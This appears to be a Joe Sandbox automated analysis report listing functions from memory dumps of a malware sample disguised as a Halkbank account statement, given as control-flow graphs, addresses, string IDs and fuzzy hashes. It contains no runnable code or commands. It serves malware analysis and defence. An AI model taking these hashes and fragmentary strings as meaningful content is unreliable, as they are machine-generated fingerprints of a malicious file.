                                                              control_flow_graph 1098 1004b31-1004b60 1099 1004b62 1098->1099 1100 1004b67-1004c44 call 1003960 call 1003480 1098->1100 1099->1100 1110 1004c46 1100->1110 1111 1004c4b-1004c69 1100->1111 1110->1111 1141 1004c6c call 1004e20 1111->1141 1142 1004c6c call 1004e11 1111->1142 1112 1004c72-1004c7d 1113 1004c84-1004c88 1112->1113 1114 1004c7f 1112->1114 1115 1004c8a-1004c8b 1113->1115 1116 1004c8d-1004c94 1113->1116 1114->1113 1117 1004cac-1004cf0 1115->1117 1118 1004c96 1116->1118 1119 1004c9b-1004ca9 1116->1119 1123 1004d56-1004d6d 1117->1123 1118->1119 1119->1117 1125 1004cf2-1004d08 1123->1125 1126 1004d6f-1004d94 1123->1126 1130 1004d32 1125->1130 1131 1004d0a-1004d16 1125->1131 1132 1004d96-1004dab 1126->1132 1133 1004dac 1126->1133 1136 1004d38-1004d55 1130->1136 1134 1004d20-1004d26 1131->1134 1135 1004d18-1004d1e 1131->1135 1132->1133 1137 1004d30 1134->1137 1135->1137 1136->1123 1137->1136 1141->1112 1142->1112
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                              • API String ID: 0-1229222154
                                                              • Opcode ID: 00825124128ae926863752ed5f05dcafa43606b128bcfcaaf4c5ac0bd5e2229a
                                                              • Instruction ID: 87c0174386f85d549c42a27ad6498598e066b998cea196ab663c0f37e43082b3
                                                              • Opcode Fuzzy Hash: 00825124128ae926863752ed5f05dcafa43606b128bcfcaaf4c5ac0bd5e2229a
                                                              • Instruction Fuzzy Hash: 7E81F574E00218DFEB54DFA9D884A9DBBF2BF88300F14C069E949AB365DB349981CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0100CA92 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1234 100ca92-100cac0 1235 100cac2 1234->1235 1236 100cac7-100cba4 call 1003960 call 1003480 1234->1236 1235->1236 1246 100cba6 1236->1246 1247 100cbab-100cbcc call 1004e20 1236->1247 1246->1247 1249 100cbd1-100cbdc 1247->1249 1250 100cbe3-100cbe7 1249->1250 1251 100cbde 1249->1251 1252 100cbe9-100cbea 1250->1252 1253 100cbec-100cbf3 1250->1253 1251->1250 1254 100cc0b-100cc4f 1252->1254 1255 100cbf5 1253->1255 1256 100cbfa-100cc08 1253->1256 1260 100ccb5-100cccc 1254->1260 1255->1256 1256->1254 1262 100cc51-100cc67 1260->1262 1263 100ccce-100ccf3 1260->1263 1267 100cc91 1262->1267 1268 100cc69-100cc75 1262->1268 1269 100ccf5-100cd0a 1263->1269 1270 100cd0b 1263->1270 1273 100cc97-100ccb4 1267->1273 1271 100cc77-100cc7d 1268->1271 1272 100cc7f-100cc85 1268->1272 1269->1270 1274 100cc8f 1271->1274 1272->1274 1273->1260 1274->1273
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                              • API String ID: 0-1229222154
                                                              • Opcode ID: 4713d4385102bd14b24ddc1eaa3a740d88d8e7816f20fd31d6bfc4f2af00c8c1
                                                              • Instruction ID: 050a2dfc92ac7c0d5940c89b36c1f05ac0ad7d0a988650a3ecb04809cc713c26
                                                              • Opcode Fuzzy Hash: 4713d4385102bd14b24ddc1eaa3a740d88d8e7816f20fd31d6bfc4f2af00c8c1
                                                              • Instruction Fuzzy Hash: 9E81E674E00218DFEB54DFA9D984A9DBBF2BF88300F14C1A9E849AB365DB345981CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0100BC32 Relevance: 6.4, Strings: 5, Instructions: 183COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1278 100bc32-100bc60 1279 100bc62 1278->1279 1280 100bc67-100bd44 call 1003960 call 1003480 1278->1280 1279->1280 1290 100bd46 1280->1290 1291 100bd4b-100bd6c call 1004e20 1280->1291 1290->1291 1293 100bd71-100bd7c 1291->1293 1294 100bd83-100bd87 1293->1294 1295 100bd7e 1293->1295 1296 100bd89-100bd8a 1294->1296 1297 100bd8c-100bd93 1294->1297 1295->1294 1298 100bdab-100bdef 1296->1298 1299 100bd95 1297->1299 1300 100bd9a-100bda8 1297->1300 1304 100be55-100be6c 1298->1304 1299->1300 1300->1298 1306 100bdf1-100be07 1304->1306 1307 100be6e-100be93 1304->1307 1311 100be31 1306->1311 1312 100be09-100be15 1306->1312 1313 100be95-100beaa 1307->1313 1314 100beab 1307->1314 1317 100be37-100be54 1311->1317 1315 100be17-100be1d 1312->1315 1316 100be1f-100be25 1312->1316 1313->1314 1318 100be2f 1315->1318 1316->1318 1317->1304 1318->1317
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                              • API String ID: 0-1229222154
                                                              • Opcode ID: 2e540b6708813aa96a0ffcee11c852197ee02e0f361d08721c71f2aee9a23cbe
                                                              • Instruction ID: 13e4b82062ae29284bc26dc49c37a138eb066d69fd71803f9ad7ed3d05b6305a
                                                              • Opcode Fuzzy Hash: 2e540b6708813aa96a0ffcee11c852197ee02e0f361d08721c71f2aee9a23cbe
                                                              • Instruction Fuzzy Hash: D881C474E00218CFEB55DFA9D984A9DBBF2BF88310F14C06AE449AB365DB349941CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 010068E0 Relevance: 5.3, Strings: 4, Instructions: 331COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (o]q$(o]q$,aq$,aq
                                                              • API String ID: 0-1947289240
                                                              • Opcode ID: b5ed7d3fc848cdb990d77a60e708f01317448ac55fb3986585294ab9c1139437
                                                              • Instruction ID: db475b8fa6ac68d51fb8bd8b665e8e112b37ebf886625789c864cfc8401e11a0
                                                              • Opcode Fuzzy Hash: b5ed7d3fc848cdb990d77a60e708f01317448ac55fb3986585294ab9c1139437
                                                              • Instruction Fuzzy Hash: 38D13F70E00119DFEB56CF99C984AADBBF7FF88304F1580A5E585AB2A1D732D861CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0100B552 Relevance: 3.9, Strings: 3, Instructions: 152COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0o@p$PH]q$PH]q
                                                              • API String ID: 0-2023588385
                                                              • Opcode ID: e84933c7152d30a3938f13054c460415db5be337b6ddf69c3b6d7b66ce606e13
                                                              • Instruction ID: ce4580e4ff6c26bac9c2a81a8569f2b1fd43ef2bcdd75ad96ad94b5281327b46
                                                              • Opcode Fuzzy Hash: e84933c7152d30a3938f13054c460415db5be337b6ddf69c3b6d7b66ce606e13
                                                              • Instruction Fuzzy Hash: 1F61C374E006089FEB59DFAAD984A9DBBF2FF88300F14C069E848AB365DB345941CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01009848 Relevance: 3.4, Strings: 2, Instructions: 893COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (o]q$4']q
                                                              • API String ID: 0-176817397
                                                              • Opcode ID: 1ab86319d2c7c1f58ff35be95a5353b3e95aa8ab20f528f7a823b8a51e952e32
                                                              • Instruction ID: f29d2ed3666c9358fcf6e05320e775441c0419e96467fabdcc9fabe0ee74d391
                                                              • Opcode Fuzzy Hash: 1ab86319d2c7c1f58ff35be95a5353b3e95aa8ab20f528f7a823b8a51e952e32
                                                              • Instruction Fuzzy Hash: C782B131A00219DFDF16CF68C584AAEBBF2FF49304F158569E4899B3A2D735E981CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 066390A1 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PH]q$PH]q
                                                              • API String ID: 0-1166926398
                                                              • Opcode ID: fdc9b83613e1f8ee568669c77bf4109727c64758f91a6613c1f480f153d18dfc
                                                              • Instruction ID: e8a76d8dd5c232fd85e382871195459c42b47622c912be90e06586466d8c5ba4
                                                              • Opcode Fuzzy Hash: fdc9b83613e1f8ee568669c77bf4109727c64758f91a6613c1f480f153d18dfc
                                                              • Instruction Fuzzy Hash: 5681E470E00228CFDB58DFA9D99469DBBF2BF89304F20816AD419BB354DB745946CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 066289B0 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224906615.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6620000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: db50996a5b27ceedaa04588bbb46d96a652a6fb349203fc40340e8b81d1ecf8d
                                                              • Instruction ID: 9538322c4542fea33cce03dfe683199b62b12c02f8add242c23424e386c6dd8b
                                                              • Opcode Fuzzy Hash: db50996a5b27ceedaa04588bbb46d96a652a6fb349203fc40340e8b81d1ecf8d
                                                              • Instruction Fuzzy Hash: 9FF11674E01229CFDB54DFA8C884B9DBBB2BF88304F54C1A9E448AB355DB34A985CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0662BE28 Relevance: 1.6, APIs: 1, Instructions: 100libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224906615.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6620000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 134dec217246f8ac1555ce754579c5f27a6ec8f48c9168c23f272ed9a69a3474
                                                              • Instruction ID: 893630847ecdc44d3b7bace49d59dff55e6d9ad4c4da2e0d6de216e272e0ece4
                                                              • Opcode Fuzzy Hash: 134dec217246f8ac1555ce754579c5f27a6ec8f48c9168c23f272ed9a69a3474
                                                              • Instruction Fuzzy Hash: F74135B4E006199FDB14CF99C584AEEFBB2FF88314F248169E4046B391C731A986CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 066315F8 Relevance: .7, Instructions: 745COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e724a5f64ad66c010bb6161ff9fa36792e4371e23e4738297b13d3d017e04bce
                                                              • Instruction ID: 6804e411d992927a4ef178bdb637de680c8e7aad8ad068c6066a7f3bcb7f19cb
                                                              • Opcode Fuzzy Hash: e724a5f64ad66c010bb6161ff9fa36792e4371e23e4738297b13d3d017e04bce
                                                              • Instruction Fuzzy Hash: 82827C74E012289FDB64DF69C898BDDBBB2BF89300F1081EAA44DA7255DB355E81CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06638A58 Relevance: .3, Instructions: 296COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b0b05d34a36c3e12e646af80a6f385a3bb7fb605b61d5d07c7582edd38613c4c
                                                              • Instruction ID: 93a341a5dab06c531cec5d5aed4fe44beb2bf7460923e8c9699dd7f166052e66
                                                              • Opcode Fuzzy Hash: b0b05d34a36c3e12e646af80a6f385a3bb7fb605b61d5d07c7582edd38613c4c
                                                              • Instruction Fuzzy Hash: 25E1D274E01218CFEB64DFA5C984BDDBBB2BF89304F2081A9D408AB394DB755A85CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0663CE28 Relevance: .2, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3974959473c0442e53e9388c2090f19d14f44e9baf3a8d0c5c580f20fa3d2b65
                                                              • Instruction ID: ba11624e34ed4441ff8000c3ca0e4c1fd022b2715eda3e98e44be6c537fc311c
                                                              • Opcode Fuzzy Hash: 3974959473c0442e53e9388c2090f19d14f44e9baf3a8d0c5c580f20fa3d2b65
                                                              • Instruction Fuzzy Hash: C1A19274E012288FEB68DF6AC944B9DBBF2AF89300F14D0AAD40DB7255DB345A85CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0663DAC0 Relevance: .2, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3bce19b9e0a662f57b5e167125f2a1b1b47d398700216819f03af9bc51d1adf0
                                                              • Instruction ID: 08ba7270cbed19da73efd9b5975a69d881c1ebc93232d8122ec842fb162061aa
                                                              • Opcode Fuzzy Hash: 3bce19b9e0a662f57b5e167125f2a1b1b47d398700216819f03af9bc51d1adf0
                                                              • Instruction Fuzzy Hash: ECA1A270E012288FEB68DF6AC944B9DFBF2AF89300F14D0AAD40DA7254DB745A85CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0663BB38 Relevance: .2, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 25a25f48c2882ccd3270d60bdfd75ec47a39c299ec18fb0057962c9f3338f324
                                                              • Instruction ID: da914cbb36173ede69d1c59e7267d48c6ea1fac510a545493574876773796b29
                                                              • Opcode Fuzzy Hash: 25a25f48c2882ccd3270d60bdfd75ec47a39c299ec18fb0057962c9f3338f324
                                                              • Instruction Fuzzy Hash: DDA19274E012288FEB68DF6AC944B9DFBF2AF89300F14D0AAD50DA7254DB345A85CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0663C7D8 Relevance: .2, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bbf04daa82d0cf9b101bed8165d465a036f791441c90b01c1eff7d7bd11fdcdd
                                                              • Instruction ID: 8ec2f7dc60632673ecb2ef8763986e6af2c80e29d54e88297a3daf2befb1658d
                                                              • Opcode Fuzzy Hash: bbf04daa82d0cf9b101bed8165d465a036f791441c90b01c1eff7d7bd11fdcdd
                                                              • Instruction Fuzzy Hash: 60A1A175E012288FEB68DF6AC944B9DBBF2AF89300F14D0AAD40DB7254DB305A85CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0663A858 Relevance: .2, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9d2d80d0cac2490702f5ae7a4d5f8a1b1c3c0b55e9e1894f893cfab7f27ad5ea
                                                              • Instruction ID: b7479281b8c5cc26d07563d070894da56b1c1de6c913b4da6fff6bbd649de586
                                                              • Opcode Fuzzy Hash: 9d2d80d0cac2490702f5ae7a4d5f8a1b1c3c0b55e9e1894f893cfab7f27ad5ea
                                                              • Instruction Fuzzy Hash: 3DA1A175E012288FEB68CF6AC944B9DBBF2BF89300F14C0AAD44DA7254DB345A85CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0663C188 Relevance: .2, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 332a3ee2ad2dba2d65c6193b7c4682bb6cee28e8cffbc8a8c6c2d2c884000301
                                                              • Instruction ID: c5e36627c330bc17b80d006d9030b2af3d88924f75fca2f636313b28208ac0a1
                                                              • Opcode Fuzzy Hash: 332a3ee2ad2dba2d65c6193b7c4682bb6cee28e8cffbc8a8c6c2d2c884000301
                                                              • Instruction Fuzzy Hash: 27A1A071E012288FEB68DF6AC944B9DBBF2AF89300F14D0AAD40DB7255DB305A85CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0663AEA8 Relevance: .2, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f814b8b18b8724862d808f7f959ce6f9a6229334caec7fe3c34d033fd72d699
                                                              • Instruction ID: d2978a2782365fd93ea2d145dc1eacebfb22633df09364a0f29bbff8bb9adf07
                                                              • Opcode Fuzzy Hash: 5f814b8b18b8724862d808f7f959ce6f9a6229334caec7fe3c34d033fd72d699
                                                              • Instruction Fuzzy Hash: 2EA1A174E012288FEB68DF6AC944B9DFBF2AF89300F14C0AAD40DA7255DB345A85CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0663D478 Relevance: .2, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be7e926aa01b943356e1ec048cd920c01a12e38b2eb81a43776f95dca0822820
                                                              • Instruction ID: 979a7038723567274be604afec28614405e2350b268c38d0529fd8e4fe7639cd
                                                              • Opcode Fuzzy Hash: be7e926aa01b943356e1ec048cd920c01a12e38b2eb81a43776f95dca0822820
                                                              • Instruction Fuzzy Hash: B3A18274E012288FEB68DF6AC944B9DFBF2AF89300F14D0AAD40DA7255DB345A85CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0663B4F0 Relevance: .2, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 10de584fcd687b2d44cb951630881b5138c9d0ab79ea3ef4c9a65ce67df62c57
                                                              • Instruction ID: ba3b5ca9c5ca787c77d149d11df208feaa6d8044d2c159be751298ac4f7b8a5d
                                                              • Opcode Fuzzy Hash: 10de584fcd687b2d44cb951630881b5138c9d0ab79ea3ef4c9a65ce67df62c57
                                                              • Instruction Fuzzy Hash: 84A19174E012288FEB68DF6AC944B9DBBF2AF89300F14C0AAD40DA7255DB345A85CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06638A48 Relevance: .1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2bac6547d365798c1d40529501873bec95423782b63a1eb35dad232a86fd6263
                                                              • Instruction ID: dfc1af528b1631ae52026b0daf7cf15218d09a39ca73d6a6d6367411e974c6fe
                                                              • Opcode Fuzzy Hash: 2bac6547d365798c1d40529501873bec95423782b63a1eb35dad232a86fd6263
                                                              • Instruction Fuzzy Hash: C541D0B0D016188BEB58DFAAC8447DEBBB2BF88304F10C06AD418BB294DB754946CF65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0663DAAF Relevance: .1, Instructions: 112COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0456eb4150d5462b922dcf9d4a62a31c7af117962a25785849683cae62ab707f
                                                              • Instruction ID: 3ef3e8c993040104e77f4b628cdeb6cde9b23a79cc6453a726577967f29253e9
                                                              • Opcode Fuzzy Hash: 0456eb4150d5462b922dcf9d4a62a31c7af117962a25785849683cae62ab707f
                                                              • Instruction Fuzzy Hash: F84188B1D056288BEB58CF6BC944789FAF3AFC9310F14C1AAC50CA6265DB740A86CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0663CE18 Relevance: .1, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 46d93b72a9350a2960fc1617739e10f0472dccf6b84859ed1068875974855d9a
                                                              • Instruction ID: 3bfc53935f9d09c60e652f286d4cafd7d30f7ab52914c2fd9eced9e547345560
                                                              • Opcode Fuzzy Hash: 46d93b72a9350a2960fc1617739e10f0472dccf6b84859ed1068875974855d9a
                                                              • Instruction Fuzzy Hash: D6417C71D016288BEB58CF6BCD557D9FAF3AFC9300F04C0AAD50CA6254DB741A868F51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0663BB27 Relevance: .1, Instructions: 109COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0fd80ea94c9ec7b7eca7d4567e03a8fe5a13eeeae9117dd4cfa8847eb21bddbb
                                                              • Instruction ID: a0620060cbbf1a3216248cea9c187b3da8acb6ba3dd1859d70ccd4304496f49b
                                                              • Opcode Fuzzy Hash: 0fd80ea94c9ec7b7eca7d4567e03a8fe5a13eeeae9117dd4cfa8847eb21bddbb
                                                              • Instruction Fuzzy Hash: E94158B1D016288BEB58CF6BC945799FAF3AFC9300F14C1AAC50CA6264DB740A86CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0663C178 Relevance: .1, Instructions: 109COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f41d4cade419e56ece73b4924248bc3debaad1e9a115d40ab934f3ee87a7dbf1
                                                              • Instruction ID: 89146c23492cdbce23bcbe888fae2566dfd50852a051ae5723d700d392e6dd9b
                                                              • Opcode Fuzzy Hash: f41d4cade419e56ece73b4924248bc3debaad1e9a115d40ab934f3ee87a7dbf1
                                                              • Instruction Fuzzy Hash: A94179B1D016289FEB58CF6BC945789FAF3AFC9304F04C1AAD50CA6264DB740A86CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0663C7CB Relevance: .1, Instructions: 105COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f1e8dca7c171860fc8d19cc92744c73346687d785f538e86b6c7b25a396d336c
